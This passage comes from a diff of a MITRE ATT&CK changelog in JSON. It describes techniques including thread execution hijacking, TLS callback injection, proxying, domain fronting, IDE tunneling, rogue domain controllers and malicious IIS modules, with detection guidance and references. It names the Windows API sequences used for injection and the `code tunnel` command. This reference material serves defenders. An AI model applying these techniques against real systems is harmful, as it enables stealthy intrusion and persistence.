"attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:28:32.166000+00:00", + "modified": "2025-04-25 14:46:28.558000+00:00", + "name": "Thread Execution Hijacking", + "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/003", + "external_id": "T1055.003" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Modification", + "Process: Process Access" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:28.558000+00:00\", \"old_value\": \"2025-04-15 19:58:26.012000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:30:41.092000+00:00", + "modified": "2025-04-25 14:48:21.860000+00:00", + "name": "Thread Local Storage", + "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process\u2019 memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/005", + "external_id": "T1055.005" + }, + { + "source_name": "FireEye TLS Nov 2017", + "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Modification", + "Process: Process Access", + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:21.860000+00:00\", \"old_value\": \"2025-04-15 19:59:16.376000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:08.479000+00:00", + "modified": "2025-04-25 15:15:44.084000+00:00", + "name": "Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090", + "external_id": "T1090" + }, + { + "source_name": "Trend Micro APT Attack Tools", + "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jon Sheedy", + "Heather Linn", + "Walker Johnson" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network Devices", + "ESXi" + ], + "x_mitre_version": "3.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:44.084000+00:00\", \"old_value\": \"2025-04-15 19:58:41.686000+00:00\"}}}", + "previous_version": "3.2", + "changelog_mitigations": { + "shared": [ + "M1020: SSL/TLS Inspection", + "M1031: Network Intrusion Prevention", + "M1037: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 23:29:19.581000+00:00", + "modified": "2025-04-25 14:48:02.492000+00:00", + "name": "Domain Fronting", + "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090/004", + "external_id": "T1090.004" + }, + { + "source_name": "Fifield Blocking Resistent Communication through domain fronting 2015", + "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.", + "url": "http://www.icir.org/vern/papers/meek-PETS-2015.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Kelly, @breakersall" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:02.492000+00:00\", \"old_value\": \"2025-04-16 20:37:20.863000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1020: SSL/TLS Inspection" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--77e29a47-e263-4f11-8692-e5012f44dbac", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-20 18:46:24.598000+00:00", + "modified": "2025-04-22 16:34:13.454000+00:00", + "name": "IDE Tunneling", + "description": "Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)\n\nAdditionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network.\n\nIDE tunneling tools may be built-in or installed as [IDE Extensions](https://attack.mitre.org/techniques/T1176/002).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1219/001", + "external_id": "T1219.001" + }, + { + "source_name": "sentinelone operationDigitalEye Dec 2024", + "description": "Aleksandar Milenkoski, Luigi Martire. (2024, December 10). Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels. Retrieved February 27, 2025.", + "url": "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/" + }, + { + "source_name": "Unit42 Chinese VSCode 06 September 2024", + "description": "Tom Fakterman. (2024, September 6). Chinese APT Abuses VSCode to Target Government in Asia. Retrieved March 24, 2025.", + "url": "https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/" + }, + { + "source_name": "Thornton tutorial VSCode shell September 2023", + "description": "Truvis Thornton. (2023, September 25). Visual Studio Code: embedded reverse shell and how to block, create Sentinel Detection, and add Environment Prevention. Retrieved March 24, 2025.", + "url": "https://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Purinut Wongwaiwuttiguldej" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "File: File Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Purinut Wongwaiwuttiguldej\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 16:34:13.454000+00:00\", \"old_value\": \"2025-04-15 19:58:42.909000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0022: File (File Creation)", + "DS0029: Network Traffic (Network Connection Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--a9fb6b3f-4a3c-4703-a4f1-f55f83d1e017", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-26 15:36:18.409000+00:00", + "modified": "2025-05-02 19:13:42.314000+00:00", + "name": "Remote Access Hardware", + "description": "An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment. \n\nRemote access hardware may be physically installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote session with the target system. Using hardware-based remote access tools may allow threat actors to bypass software security solutions and gain more control over the compromised device(s).(Citation: Palo Alto Unit 42 North Korean IT Workers 2024)(Citation: Google Cloud Threat Intelligence DPRK IT Workers 2024)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1219/003", + "external_id": "T1219.003" + }, + { + "source_name": "Google Cloud Threat Intelligence DPRK IT Workers 2024", + "description": "Codi Starks, Michael Barnhart, Taylor Long, Mike Lombardi, Joseph Pisano, and Alice Revelli. (2024, September 23). Staying a Step Ahead: Mitigating the DPRK IT Worker Threat. Retrieved March 26, 2025.", + "url": "https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/" + }, + { + "source_name": "Palo Alto Unit 42 North Korean IT Workers 2024", + "description": "Evan Gordenker. (2024, November 13). Global Companies Are Unknowingly Paying North Koreans: Here\u2019s How to Catch Them. Retrieved March 26, 2025.", + "url": "https://unit42.paloaltonetworks.com/north-korean-it-workers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Joe Gumke, U.S. Bank", + "Shwetank Murarka", + "Michael Davis, ServiceNow Threat Intelligence" + ], + "x_mitre_data_sources": [ + "Drive: Drive Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-05-02 19:13:42.314000+00:00\", \"old_value\": \"2025-04-16 17:20:16.375000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][2]\": \"Michael Davis, ServiceNow Threat Intelligence\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][1]\": \"Michael Davis @ ServiceNow Threat Intelligence\"}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1034: Limit Hardware Installation" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0016: Drive (Drive Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 15:15:34.258000+00:00", + "name": "Rogue Domain Controller", + "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1207", + "external_id": "T1207" + }, + { + "source_name": "DCShadow Blog", + "description": "Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.", + "url": "https://www.dcshadow.com/" + }, + { + "source_name": "Adsecurity Mimikatz Guide", + "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?page_id=1821" + }, + { + "source_name": "GitHub DCSYNCMonitor", + "description": "Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.", + "url": "https://github.com/shellster/DCSYNCMonitor" + }, + { + "source_name": "Microsoft DirSync", + "description": "Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.", + "url": "https://msdn.microsoft.com/en-us/library/ms677626.aspx" + }, + { + "source_name": "ADDSecurity DCShadow Feb 2018", + "description": "Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.", + "url": "https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_data_sources": [ + "Active Directory: Active Directory Object Modification", + "Network Traffic: Network Traffic Content", + "User Account: User Account Authentication", + "Active Directory: Active Directory Object Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \u201cGC/\u201d) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235\u20134B06\u201311D1-AB04\u201300C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:34.258000+00:00\", \"old_value\": \"2025-04-15 19:58:32.959000+00:00\"}}}", + "previous_version": "2.2", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0002: User Account (User Account Authentication)", + "DS0026: Active Directory (Active Directory Object Creation)", + "DS0026: Active Directory (Active Directory Object Modification)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-03 18:44:29.770000+00:00", + "modified": "2025-04-25 14:47:43.995000+00:00", + "name": "IIS Components", + "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/004", + "external_id": "T1505.004" + }, + { + "source_name": "Microsoft ISAPI Extension Overview 2017", + "description": "Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)" + }, + { + "source_name": "Microsoft ISAPI Filter Overview 2017", + "description": "Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)" + }, + { + "source_name": "IIS Backdoor 2011", + "description": "Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.", + "url": "https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html" + }, + { + "source_name": "Trustwave IIS Module 2013", + "description": "Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/" + }, + { + "source_name": "Microsoft ISAPI Extension All Incoming 2017", + "description": "Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "MMPC ISAPI Filter 2012", + "description": "MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.", + "url": "https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx" + }, + { + "source_name": "Microsoft IIS Modules Overview 2007", + "description": "Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.", + "url": 